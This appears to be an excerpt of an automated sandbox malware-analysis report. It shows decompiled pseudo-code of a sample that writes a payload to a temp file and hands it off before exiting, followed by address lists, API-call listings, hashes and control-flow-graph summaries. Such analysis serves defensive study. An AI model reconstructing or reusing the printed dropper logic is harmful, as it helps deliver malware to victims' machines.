                                                                                                                                                                                                                                                                                                        								E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                                        								E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                                                        								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                                        								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                                        								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                                                        								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                                                        								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v608 = 0;
                                                                                                                                                                                                                                                                                                        								_v612 = 0;
                                                                                                                                                                                                                                                                                                        								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                                                        								__eflags = _t415;
                                                                                                                                                                                                                                                                                                        								if(_t415 == 0) {
                                                                                                                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                                                                                                                        									__eflags = _v608;
                                                                                                                                                                                                                                                                                                        									if(_v608 == 0) {
                                                                                                                                                                                                                                                                                                        										CloseHandle(_v328);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L39;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                                                        								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                                                        								E04006C60();
                                                                                                                                                                                                                                                                                                        								_t421 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                                                        								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                                        								_v616 = _t421;
                                                                                                                                                                                                                                                                                                        								__eflags = _v616;
                                                                                                                                                                                                                                                                                                        								if(_v616 == 0) {
                                                                                                                                                                                                                                                                                                        									E04006CF0();
                                                                                                                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								E040074A0();
                                                                                                                                                                                                                                                                                                        								ExitProcess(0);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v60 =  *_v20;
                                                                                                                                                                                                                                                                                                        							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                                                        							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                                                        							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                                        								goto L29;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return 0;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                                                        						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                                        							 *0x40130e4 = 1;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							 *0x40130e4 = 2;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L99;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
















































































                                                                                                                                                                                                                                                                                                        0x040062b9
                                                                                                                                                                                                                                                                                                        0x040062c4
                                                                                                                                                                                                                                                                                                        0x04006c4e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040062d4
                                                                                                                                                                                                                                                                                                        0x040062d9
                                                                                                                                                                                                                                                                                                        0x040062e0
                                                                                                                                                                                                                                                                                                        0x040062f9
                                                                                                                                                                                                                                                                                                        0x040062fc
                                                                                                                                                                                                                                                                                                        0x0400630e
                                                                                                                                                                                                                                                                                                        0x0400631e
                                                                                                                                                                                                                                                                                                        0x04006343
                                                                                                                                                                                                                                                                                                        0x04006349
                                                                                                                                                                                                                                                                                                        0x04006354
                                                                                                                                                                                                                                                                                                        0x0400635d
                                                                                                                                                                                                                                                                                                        0x04006363
                                                                                                                                                                                                                                                                                                        0x04006429
                                                                                                                                                                                                                                                                                                        0x04006308
                                                                                                                                                                                                                                                                                                        0x04006308
                                                                                                                                                                                                                                                                                                        0x0400630b
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400630b
                                                                                                                                                                                                                                                                                                        0x0400636f
                                                                                                                                                                                                                                                                                                        0x04006375
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400637b
                                                                                                                                                                                                                                                                                                        0x04006381
                                                                                                                                                                                                                                                                                                        0x04006384
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006391
                                                                                                                                                                                                                                                                                                        0x04006393
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006399
                                                                                                                                                                                                                                                                                                        0x0400639f
                                                                                                                                                                                                                                                                                                        0x040063a2
                                                                                                                                                                                                                                                                                                        0x04006419
                                                                                                                                                                                                                                                                                                        0x0400641e
                                                                                                                                                                                                                                                                                                        0x04006424
                                                                                                                                                                                                                                                                                                        0x04006427
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006427
                                                                                                                                                                                                                                                                                                        0x040063ad
                                                                                                                                                                                                                                                                                                        0x040063c3
                                                                                                                                                                                                                                                                                                        0x040063c6
                                                                                                                                                                                                                                                                                                        0x040063ca
                                                                                                                                                                                                                                                                                                        0x0400640e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400640e
                                                                                                                                                                                                                                                                                                        0x040063dc
                                                                                                                                                                                                                                                                                                        0x040063e1
                                                                                                                                                                                                                                                                                                        0x040063e4
                                                                                                                                                                                                                                                                                                        0x040063ef
                                                                                                                                                                                                                                                                                                        0x040063f4
                                                                                                                                                                                                                                                                                                        0x040063fa
                                                                                                                                                                                                                                                                                                        0x040063fa
                                                                                                                                                                                                                                                                                                        0x04006408
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006320
                                                                                                                                                                                                                                                                                                        0x04006325
                                                                                                                                                                                                                                                                                                        0x0400632e
                                                                                                                                                                                                                                                                                                        0x0400633a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400633c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400633c
                                                                                                                                                                                                                                                                                                        0x0400633a
                                                                                                                                                                                                                                                                                                        0x0400631e
                                                                                                                                                                                                                                                                                                        0x0400642e
                                                                                                                                                                                                                                                                                                        0x04006438
                                                                                                                                                                                                                                                                                                        0x0400643b
                                                                                                                                                                                                                                                                                                        0x0400644d
                                                                                                                                                                                                                                                                                                        0x04006450
                                                                                                                                                                                                                                                                                                        0x04006453
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006459
                                                                                                                                                                                                                                                                                                        0x0400645d
                                                                                                                                                                                                                                                                                                        0x04006482
                                                                                                                                                                                                                                                                                                        0x04006488
                                                                                                                                                                                                                                                                                                        0x04006493
                                                                                                                                                                                                                                                                                                        0x0400649c
                                                                                                                                                                                                                                                                                                        0x040064a2
                                                                                                                                                                                                                                                                                                        0x040065f3
                                                                                                                                                                                                                                                                                                        0x040065f3
                                                                                                                                                                                                                                                                                                        0x040065f9
                                                                                                                                                                                                                                                                                                        0x040065fc
                                                                                                                                                                                                                                                                                                        0x04006609
                                                                                                                                                                                                                                                                                                        0x0400660f
                                                                                                                                                                                                                                                                                                        0x04006bdd
                                                                                                                                                                                                                                                                                                        0x04006be3
                                                                                                                                                                                                                                                                                                        0x04006be9
                                                                                                                                                                                                                                                                                                        0x04006c18
                                                                                                                                                                                                                                                                                                        0x04006c1e
                                                                                                                                                                                                                                                                                                        0x04006c24
                                                                                                                                                                                                                                                                                                        0x04006c26
                                                                                                                                                                                                                                                                                                        0x04006c26
                                                                                                                                                                                                                                                                                                        0x04006c2a
                                                                                                                                                                                                                                                                                                        0x04006444
                                                                                                                                                                                                                                                                                                        0x04006447
                                                                                                                                                                                                                                                                                                        0x04006447
                                                                                                                                                                                                                                                                                                        0x0400644a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400644a
                                                                                                                                                                                                                                                                                                        0x04006bf1
                                                                                                                                                                                                                                                                                                        0x04006bf7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006c01
                                                                                                                                                                                                                                                                                                        0x04006c07
                                                                                                                                                                                                                                                                                                        0x04006c0e
                                                                                                                                                                                                                                                                                                        0x04006c13
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006c13
                                                                                                                                                                                                                                                                                                        0x0400661b
                                                                                                                                                                                                                                                                                                        0x04006621
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006633
                                                                                                                                                                                                                                                                                                        0x04006638
                                                                                                                                                                                                                                                                                                        0x0400663e
                                                                                                                                                                                                                                                                                                        0x04006640
                                                                                                                                                                                                                                                                                                        0x04006647
                                                                                                                                                                                                                                                                                                        0x0400664a
                                                                                                                                                                                                                                                                                                        0x0400664e
                                                                                                                                                                                                                                                                                                        0x04006752
                                                                                                                                                                                                                                                                                                        0x04006752
                                                                                                                                                                                                                                                                                                        0x04006758
                                                                                                                                                                                                                                                                                                        0x0400675b
                                                                                                                                                                                                                                                                                                        0x040069cb
                                                                                                                                                                                                                                                                                                        0x040069dc
                                                                                                                                                                                                                                                                                                        0x040069ed
                                                                                                                                                                                                                                                                                                        0x040069f2
                                                                                                                                                                                                                                                                                                        0x04006a1a
                                                                                                                                                                                                                                                                                                        0x04006a3c
                                                                                                                                                                                                                                                                                                        0x04006a42
                                                                                                                                                                                                                                                                                                        0x04006a49
                                                                                                                                                                                                                                                                                                        0x04006bd6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006bd6
                                                                                                                                                                                                                                                                                                        0x04006a4f
                                                                                                                                                                                                                                                                                                        0x04006a59
                                                                                                                                                                                                                                                                                                        0x04006a66
                                                                                                                                                                                                                                                                                                        0x04006a6c
                                                                                                                                                                                                                                                                                                        0x04006a72
                                                                                                                                                                                                                                                                                                        0x04006a75
                                                                                                                                                                                                                                                                                                        0x04006b3c
                                                                                                                                                                                                                                                                                                        0x04006a7b
                                                                                                                                                                                                                                                                                                        0x04006a84
                                                                                                                                                                                                                                                                                                        0x04006aa0
                                                                                                                                                                                                                                                                                                        0x04006aa6
                                                                                                                                                                                                                                                                                                        0x04006aad
                                                                                                                                                                                                                                                                                                        0x04006ac5
                                                                                                                                                                                                                                                                                                        0x04006aca
                                                                                                                                                                                                                                                                                                        0x04006ad0
                                                                                                                                                                                                                                                                                                        0x04006af6
                                                                                                                                                                                                                                                                                                        0x04006b02
                                                                                                                                                                                                                                                                                                        0x04006b02
                                                                                                                                                                                                                                                                                                        0x04006b16
                                                                                                                                                                                                                                                                                                        0x04006b16
                                                                                                                                                                                                                                                                                                        0x04006b1c
                                                                                                                                                                                                                                                                                                        0x04006b42
                                                                                                                                                                                                                                                                                                        0x04006b49
                                                                                                                                                                                                                                                                                                        0x04006bc9
                                                                                                                                                                                                                                                                                                        0x04006bd0
                                                                                                                                                                                                                                                                                                        0x04006b4b
                                                                                                                                                                                                                                                                                                        0x04006b51
                                                                                                                                                                                                                                                                                                        0x04006b57
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006b60
                                                                                                                                                                                                                                                                                                        0x04006b6d
                                                                                                                                                                                                                                                                                                        0x04006b72
                                                                                                                                                                                                                                                                                                        0x04006b75
                                                                                                                                                                                                                                                                                                        0x04006b7b
                                                                                                                                                                                                                                                                                                        0x04006b82
                                                                                                                                                                                                                                                                                                        0x04006b84
                                                                                                                                                                                                                                                                                                        0x04006b87
                                                                                                                                                                                                                                                                                                        0x04006b8b
                                                                                                                                                                                                                                                                                                        0x04006b99
                                                                                                                                                                                                                                                                                                        0x04006b9e
                                                                                                                                                                                                                                                                                                        0x04006b9e
                                                                                                                                                                                                                                                                                                        0x04006ba1
                                                                                                                                                                                                                                                                                                        0x04006ba7
                                                                                                                                                                                                                                                                                                        0x04006baa
                                                                                                                                                                                                                                                                                                        0x04006bb8
                                                                                                                                                                                                                                                                                                        0x04006bbd
                                                                                                                                                                                                                                                                                                        0x04006bbd
                                                                                                                                                                                                                                                                                                        0x04006bc0
                                                                                                                                                                                                                                                                                                        0x04006bc0
                                                                                                                                                                                                                                                                                                        0x04006bc7
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006b49
                                                                                                                                                                                                                                                                                                        0x04006761
                                                                                                                                                                                                                                                                                                        0x0400676b
                                                                                                                                                                                                                                                                                                        0x04006775
                                                                                                                                                                                                                                                                                                        0x0400677f
                                                                                                                                                                                                                                                                                                        0x04006785
                                                                                                                                                                                                                                                                                                        0x04006788
                                                                                                                                                                                                                                                                                                        0x0400685c
                                                                                                                                                                                                                                                                                                        0x04006861
                                                                                                                                                                                                                                                                                                        0x04006864
                                                                                                                                                                                                                                                                                                        0x0400678e
                                                                                                                                                                                                                                                                                                        0x04006797
                                                                                                                                                                                                                                                                                                        0x040067ad
                                                                                                                                                                                                                                                                                                        0x040067b3
                                                                                                                                                                                                                                                                                                        0x040067b9
                                                                                                                                                                                                                                                                                                        0x040067c0
                                                                                                                                                                                                                                                                                                        0x040067dc
                                                                                                                                                                                                                                                                                                        0x040067e1
                                                                                                                                                                                                                                                                                                        0x040067e7
                                                                                                                                                                                                                                                                                                        0x040067f0
                                                                                                                                                                                                                                                                                                        0x040067f5
                                                                                                                                                                                                                                                                                                        0x040067f8
                                                                                                                                                                                                                                                                                                        0x040067fe
                                                                                                                                                                                                                                                                                                        0x04006804
                                                                                                                                                                                                                                                                                                        0x04006807
                                                                                                                                                                                                                                                                                                        0x04006819
                                                                                                                                                                                                                                                                                                        0x0400681f
                                                                                                                                                                                                                                                                                                        0x0400683a
                                                                                                                                                                                                                                                                                                        0x0400683f
                                                                                                                                                                                                                                                                                                        0x0400683f
                                                                                                                                                                                                                                                                                                        0x04006807
                                                                                                                                                                                                                                                                                                        0x04006850
                                                                                                                                                                                                                                                                                                        0x04006850
                                                                                                                                                                                                                                                                                                        0x04006856
                                                                                                                                                                                                                                                                                                        0x0400686a
                                                                                                                                                                                                                                                                                                        0x04006871
                                                                                                                                                                                                                                                                                                        0x04006877
                                                                                                                                                                                                                                                                                                        0x0400687a
                                                                                                                                                                                                                                                                                                        0x0400687e
                                                                                                                                                                                                                                                                                                        0x0400688c
                                                                                                                                                                                                                                                                                                        0x04006891
                                                                                                                                                                                                                                                                                                        0x04006891
                                                                                                                                                                                                                                                                                                        0x04006894
                                                                                                                                                                                                                                                                                                        0x0400689a
                                                                                                                                                                                                                                                                                                        0x0400689d
                                                                                                                                                                                                                                                                                                        0x040068a5
                                                                                                                                                                                                                                                                                                        0x040068aa
                                                                                                                                                                                                                                                                                                        0x040068ad
                                                                                                                                                                                                                                                                                                        0x040068b9
                                                                                                                                                                                                                                                                                                        0x040068bf
                                                                                                                                                                                                                                                                                                        0x040068c5
                                                                                                                                                                                                                                                                                                        0x040068c8
                                                                                                                                                                                                                                                                                                        0x04006902
                                                                                                                                                                                                                                                                                                        0x0400690a
                                                                                                                                                                                                                                                                                                        0x0400690d
                                                                                                                                                                                                                                                                                                        0x04006920
                                                                                                                                                                                                                                                                                                        0x04006925
                                                                                                                                                                                                                                                                                                        0x04006931
                                                                                                                                                                                                                                                                                                        0x04006931
                                                                                                                                                                                                                                                                                                        0x040068ca
                                                                                                                                                                                                                                                                                                        0x040068d6
                                                                                                                                                                                                                                                                                                        0x040068e4
                                                                                                                                                                                                                                                                                                        0x040068e4
                                                                                                                                                                                                                                                                                                        0x0400693a
                                                                                                                                                                                                                                                                                                        0x0400693d
                                                                                                                                                                                                                                                                                                        0x0400694b
                                                                                                                                                                                                                                                                                                        0x0400695a
                                                                                                                                                                                                                                                                                                        0x04006971
                                                                                                                                                                                                                                                                                                        0x04006977
                                                                                                                                                                                                                                                                                                        0x04006984
                                                                                                                                                                                                                                                                                                        0x04006984
                                                                                                                                                                                                                                                                                                        0x0400693d
                                                                                                                                                                                                                                                                                                        0x0400698a
                                                                                                                                                                                                                                                                                                        0x04006990
                                                                                                                                                                                                                                                                                                        0x04006993
                                                                                                                                                                                                                                                                                                        0x040069a1
                                                                                                                                                                                                                                                                                                        0x040069a6
                                                                                                                                                                                                                                                                                                        0x040069a6
                                                                                                                                                                                                                                                                                                        0x040069a9
                                                                                                                                                                                                                                                                                                        0x040069a9
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040069b0
                                                                                                                                                                                                                                                                                                        0x04006667
                                                                                                                                                                                                                                                                                                        0x0400666d
                                                                                                                                                                                                                                                                                                        0x04006674
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006689
                                                                                                                                                                                                                                                                                                        0x04006693
                                                                                                                                                                                                                                                                                                        0x04006698
                                                                                                                                                                                                                                                                                                        0x0400669b
                                                                                                                                                                                                                                                                                                        0x040066a7
                                                                                                                                                                                                                                                                                                        0x040066b8
                                                                                                                                                                                                                                                                                                        0x040066c6
                                                                                                                                                                                                                                                                                                        0x040066d5
                                                                                                                                                                                                                                                                                                        0x040066e4
                                                                                                                                                                                                                                                                                                        0x040066f0
                                                                                                                                                                                                                                                                                                        0x040066ff
                                                                                                                                                                                                                                                                                                        0x0400670e
                                                                                                                                                                                                                                                                                                        0x0400671d
                                                                                                                                                                                                                                                                                                        0x0400673a
                                                                                                                                                                                                                                                                                                        0x04006747
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006747
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006642
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040065fe
                                                                                                                                                                                                                                                                                                        0x040064ae
                                                                                                                                                                                                                                                                                                        0x040064b4
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040064cb
                                                                                                                                                                                                                                                                                                        0x040064dc
                                                                                                                                                                                                                                                                                                        0x040064ed
                                                                                                                                                                                                                                                                                                        0x040064f2
                                                                                                                                                                                                                                                                                                        0x0400651a
                                                                                                                                                                                                                                                                                                        0x0400653f
                                                                                                                                                                                                                                                                                                        0x04006545
                                                                                                                                                                                                                                                                                                        0x0400654c
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04006552
                                                                                                                                                                                                                                                                                                        0x0400655c
                                                                                                                                                                                                                                                                                                        0x0400657e
                                                                                                                                                                                                                                                                                                        0x04006584
                                                                                                                                                                                                                                                                                                        0x04006586
                                                                                                                                                                                                                                                                                                        0x040065dd
                                                                                                                                                                                                                                                                                                        0x040065dd
                                                                                                                                                                                                                                                                                                        0x040065e4
                                                                                                                                                                                                                                                                                                        0x040065ed
                                                                                                                                                                                                                                                                                                        0x040065ed
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040065e4
                                                                                                                                                                                                                                                                                                        0x0400658e
                                                                                                                                                                                                                                                                                                        0x04006591
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040065a0
                                                                                                                                                                                                                                                                                                        0x040065a6
                                                                                                                                                                                                                                                                                                        0x040065b2
                                                                                                                                                                                                                                                                                                        0x040065b7
                                                                                                                                                                                                                                                                                                        0x040065ba
                                                                                                                                                                                                                                                                                                        0x040065c0
                                                                                                                                                                                                                                                                                                        0x040065c7
                                                                                                                                                                                                                                                                                                        0x040065d8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040065d8
                                                                                                                                                                                                                                                                                                        0x040065c9
                                                                                                                                                                                                                                                                                                        0x040065d0
                                                                                                                                                                                                                                                                                                        0x040065d0
                                                                                                                                                                                                                                                                                                        0x04006464
                                                                                                                                                                                                                                                                                                        0x0400646d
                                                                                                                                                                                                                                                                                                        0x04006476
                                                                                                                                                                                                                                                                                                        0x04006479
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400647b
                                                                                                                                                                                                                                                                                                        0x04006c33
                                                                                                                                                                                                                                                                                                        0x04006c36
                                                                                                                                                                                                                                                                                                        0x04006c44
                                                                                                                                                                                                                                                                                                        0x04006c38
                                                                                                                                                                                                                                                                                                        0x04006c38
                                                                                                                                                                                                                                                                                                        0x04006c38
                                                                                                                                                                                                                                                                                                        0x04006c36
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x040062e0

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                                        • String ID: Hogerfazwafx$TEMP$TEMP
                                                                                                                                                                                                                                                                                                        • API String ID: 2087232378-1474595832
                                                                                                                                                                                                                                                                                                        • Opcode ID: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
                                                                                                                                                                                                                                                                                                        • Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 627 414330-41441b strlen call 40db20 memcpy CreateMutexA WaitForSingleObject 630 41441d 627->630 631 41441e-41442d FindAtomA 627->631 630->631 632 414433-41444c malloc 631->632 633 4144b7-4144cc call 4142c0 631->633 635 414450-414453 632->635 640 414492-4144b3 ReleaseMutex CloseHandle 633->640 637 414455 635->637 638 414458-41445e 635->638 637->638 638->635 639 414460-41446f AddAtomA 638->639 641 414471-414488 call 4142c0 639->641 642 4144b4-4144b5 639->642 645 41448a-41448d free 641->645 646 4144ce-4144ea memset 641->646 642->641 645->640 646->640 647 4144ec-4144f2 646->647 647->640
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • strlen.NTDLL ref: 0041433F
                                                                                                                                                                                                                                                                                                        • memcpy.NTDLL ref: 0041438D
                                                                                                                                                                                                                                                                                                        • CreateMutexA.KERNEL32 ref: 004143F5
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0040F2D5), ref: 00414410
                                                                                                                                                                                                                                                                                                        • FindAtomA.KERNEL32 ref: 00414421
                                                                                                                                                                                                                                                                                                        • malloc.MSVCRT ref: 00414439
                                                                                                                                                                                                                                                                                                        • AddAtomA.KERNEL32 ref: 00414463
                                                                                                                                                                                                                                                                                                        • free.MSVCRT ref: 0041448D
                                                                                                                                                                                                                                                                                                        • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00414495
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 004144A1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004142C0: GetAtomNameA.KERNEL32(?,?,00000000), ref: 004142E3
                                                                                                                                                                                                                                                                                                        • memset.NTDLL ref: 004144E0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Atom$Mutex$CloseCreateFindHandleNameObjectReleaseSingleWaitfreemallocmemcpymemsetstrlen
                                                                                                                                                                                                                                                                                                        • String ID: aaaa$aaaa$aaaa$aaaa$aaaa$aaaa$aaaa
                                                                                                                                                                                                                                                                                                        • API String ID: 144078300-3683700703
                                                                                                                                                                                                                                                                                                        • Opcode ID: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6bf16c6f7dc82afa38dfb2dcebf575d49d4c190a343fd4b51b9df02f2ee255c1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38b3cc8253dde639ec07bf90a86a76e51e9cf28e81e2267e67a4dab4306abd3d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 635129B89083458BC710EF69D4863AEBBF0BF84301F01896EE8959B385D778D585CB96
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                        control_flow_graph 649 40ec50-40ed35 strlen call 40db20 memcpy CreateMutexA WaitForSingleObject 652 40ed37 649->652 653 40ed38-40ed47 FindAtomA 649->653 652->653 654 40edd3-40ede8 call 40ebe0 653->654 655 40ed4d-40ed60 malloc 653->655 662 40eda7-40edcb ReleaseMutex FindCloseChangeNotification 654->662 656 40ed65-40ed68 655->656 658 40ed6a 656->658 659 40ed6d-40ed73 656->659 658->659 659->656 661 40ed75-40ed84 AddAtomA 659->661 663 40edd0-40edd1 661->663 664 40ed86-40ed9d call 40ebe0 661->664 663->664 667 40edea-40ee06 memset 664->667 668 40ed9f-40eda2 free 664->668 667->662 669 40ee08-40ee10 667->669 668->662 669->662
                                                                                                                                                                                                                                                                                                        APIs
